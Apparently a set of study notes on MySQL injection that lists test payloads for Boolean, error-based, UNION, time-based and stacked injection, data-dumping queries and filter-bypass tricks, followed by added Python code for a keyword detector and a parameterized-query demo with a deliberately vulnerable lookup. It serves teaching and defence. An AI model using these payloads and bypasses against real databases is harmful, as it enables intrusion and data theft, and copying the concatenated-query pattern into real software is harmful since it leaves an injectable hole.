1. MySQL injection, the principle: user-supplied input is built into a SQL statement and executed by the database as part of that statement.
2. MySQL injection, hands-on experience: (1) test the parameter, (2) test the injection type, (3) test bypasses
(1) Test the parameter: for any injectable parameter, first determine its type (numeric or string); "type" here means the type of the injection parameter (***)
Commonly used test characters: quotes (single and double), parentheses, combinations of quotes and parentheses, ...
(2) Test the injection type: five main categories: Boolean-based blind, error-based, UNION query, time-based blind, and stacked queries
Boolean-based blind, test payloads: and 1=1, and 1=2, or 1=1, or 1=2 ...
Error-based injection:
floor: and (select 1 from (select count(*), concat(database(), floor(rand(0)*2)) x from information_schema.tables group by x) a)
updatexml: and 1=updatexml(1, concat(0x7e, (select database())), 1)
extractvalue: and 1=extractvalue(1, concat(0x7e, (select database())))
......
UNION query injection:
order by n // determine the number of columns; n is a positive integer
union select ... // check which columns are echoed; make the query before the union return no rows so that the union row is what gets echoed
Find the echoed position, then enumerate databases, tables, columns and values; the examples below assume the second column is echoed. Common statements:
union select 1, group_concat(schema_name), 3 from information_schema.schemata // list databases
union select 1, group_concat(table_name), 3 from information_schema.tables where table_schema=database() // list tables
union select 1, group_concat(column_name), 3 from information_schema.columns where table_name='table name' // list columns
union select 1, group_concat(field1, 0x3a, field2), 3 from table name // dump values; 0x3a is ':' and separates the two fields so they can be read apart
Time-based blind injection: based on the page response delay; test payload: and sleep(5)
Injection method (guessing):
and if(length(database())>5, sleep(5), 0) // guess the length of the database name
and if(ord(database())>100, sleep(5), 0) // guess the first character of the database name (ord() returns the code of the leftmost character)
...... sqlmap is the better choice here.
Stacked query injection: several SQL statements are executed in one request, separated by semicolons; this allows insert, delete and update statements, not only select.
(3) Test bypasses: this is simply a matter of trying; a few common ones:
Bypass space filtering: +, /**/, double spaces, newline characters (%0a, %a0), wide byte (%df), parentheses
Bypass filtering of union, select and other keywords: case variation, double writing (uniounionn, unionunion), inline comments (/*!union*/), encoding
Bypass filtering of and, or: &&, ||, %26%26, case variation, double writing (anandd, andand), encoding
......
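The bypass list above is written from the attacker's side; from the defender's side the same list is a checklist of normalizations a detection rule has to perform before it can match anything. The following added example (my own code, not from the original notes) normalizes a request parameter the way a log-analysis or alerting rule should: bounded repeated percent-decoding, latin-1 decoding so %a0 and %df stay single characters, '+' as space, MySQL's /*!...*/ comments kept (the server executes their contents) while plain /*...*/ comments are dropped, and whitespace runs collapsed. It also shows why the page's "double write" trick works against a filter that strips keywords. The sample inputs are constructed for the demo; the keyword list and function names are my assumptions.

```python
import re
from urllib.parse import unquote_to_bytes

# Keywords worth flagging in a request parameter (assumed list). 'and'/'or' are left
# out: they are far too common in ordinary text to be a useful signal on their own.
SQL_KEYWORDS = ("union", "select", "sleep", "updatexml", "extractvalue", "information_schema")


def normalize(value, max_decode_rounds=3):
    """Undo the encodings from the bypass section before matching keywords."""
    raw = value.encode("utf-8")
    # Repeated percent-decoding, bounded, so %2520 (double encoding) becomes a space.
    for _ in range(max_decode_rounds):
        if b"%" not in raw:
            break
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    # latin-1 keeps %a0 / %df as one character each instead of a replacement char.
    cur = raw.decode("latin-1").lower()
    cur = re.sub(r"/\*!(.*?)\*/", r" \1 ", cur, flags=re.S)   # /*!union*/ -> union
    cur = re.sub(r"/\*.*?\*/", " ", cur, flags=re.S)           # /**/ -> one space
    cur = cur.replace("+", " ")                                # '+' is a space in query strings
    cur = re.sub(r"\s+", " ", cur)                             # space, %0a, %a0, tabs -> one space
    return cur.strip()


def detect_keywords(value):
    """Return the flagged keywords present in the normalized input.

    Substring matching is deliberate: double-written forms such as 'uniounionn'
    still contain 'union'. The price is false positives on words like 'reunion',
    so treat this as a detection signal for logging and alerting, not as the fix
    (parameterized queries are the fix)."""
    norm = normalize(value)
    return [kw for kw in SQL_KEYWORDS if kw in norm]


def naive_strip_filter(value):
    """The kind of blacklist the page's 'double write' bypass defeats: each keyword
    is removed once, so removing the inner 'union' from 'uniounionn' leaves 'union'."""
    out = value.lower()
    for kw in SQL_KEYWORDS:
        out = out.replace(kw, "")
    return out


# Constructed request parameter values (not from the page), one per bypass technique.
SAMPLE_INPUTS = {
    "newline_space": "1%0aunion%0aselect%0a1,2,3",
    "nbsp_space": "1%a0union%a0select%a01,2,3",
    "inline_comment": "1 /*!union*/ /**/select 1,2,3",
    "double_write": "1+uniounionn+select+1,2,3",
    "double_encoded": "1%2520union%2520select%25201,2,3",
    "benign": "42",
}


def scan_samples():
    """Map each sample name to the keywords flagged for it."""
    return {name: detect_keywords(val) for name, val in SAMPLE_INPUTS.items()}


if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print(f"{name:15} -> {hits}")
    print("strip filter leaves:", naive_strip_filter(SAMPLE_INPUTS["double_write"]))
```

Every non-benign sample is flagged with both union and select after normalization, while the strip-based filter turns the double-written input back into a plain union. The decode loop is bounded on purpose: an unbounded loop on attacker-controlled input is itself a denial-of-service vector.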
3. MySQL injection defenses: strictly filter user input with whitelists and blacklists; use parameterized queries; deploy SQL injection protection appliances (WAF)
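The second defense, parameterized queries, is the one that removes the principle from point 1 entirely: the statement shape is fixed before the value is seen, so the value is never parsed as SQL. The added example below (my own code, not from the original notes) runs the same benign and malicious inputs through a concatenated query and a parameterized one, plus the whitelist check for a numeric parameter from step (1). It uses Python's built-in sqlite3 so it runs offline; the injection mechanics are the same as for MySQL, where mysql-connector and PyMySQL use %s as the placeholder instead of ?. The users table and its rows are constructed for the demo.

```python
import sqlite3

# Constructed sample data for the demo (not from the page).
SAMPLE_USERS = [
    (1, "alice", "alice@example.com"),
    (2, "bob", "bob@example.com"),
    (3, "carol", "carol@example.com"),
]


def make_db():
    """In-memory SQLite stand-in for a MySQL table; same injection mechanics apply."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Point 1 of the page: the input is spliced into the statement text, so the
    database parses whatever the user sent as SQL."""
    sql = "SELECT id, name, email FROM users WHERE id = " + str(user_id)
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Point 3 of the page: a placeholder binds the input as a value. 'or 1=1' is
    just a string that matches no id. SQLite uses '?'; MySQL drivers use '%s'."""
    sql = "SELECT id, name, email FROM users WHERE id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def validate_numeric_id(raw):
    """Whitelist check for a numeric parameter: accept only a string of digits.
    Defence in depth on top of the placeholder, not a replacement for it."""
    if not isinstance(raw, str) or not raw.isdigit():
        raise ValueError("id must be a non-negative integer")
    return int(raw)


def demo():
    """Run the same inputs through both lookups and return the row counts."""
    conn = make_db()
    benign = "2"
    boolean_input = "2 or 1=1"                # boolean-style probe from the page's first category
    union_input = "0 union select 1, 'x', 3"  # union-style probe from the page's third category
    return {
        "vuln_benign": len(lookup_vulnerable(conn, benign)),
        "vuln_boolean": len(lookup_vulnerable(conn, boolean_input)),
        "vuln_union": len(lookup_vulnerable(conn, union_input)),
        "param_benign": len(lookup_parameterized(conn, validate_numeric_id(benign))),
        "param_boolean": len(lookup_parameterized(conn, boolean_input)),
        "param_union": len(lookup_parameterized(conn, union_input)),
    }


if __name__ == "__main__":
    print(demo())
```

With concatenation the boolean input returns every row and the union input returns an attacker-chosen row; with the placeholder both return nothing, and the whitelist check rejects them before a query is even built.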
MySQL injection basics and Bypass Tips summary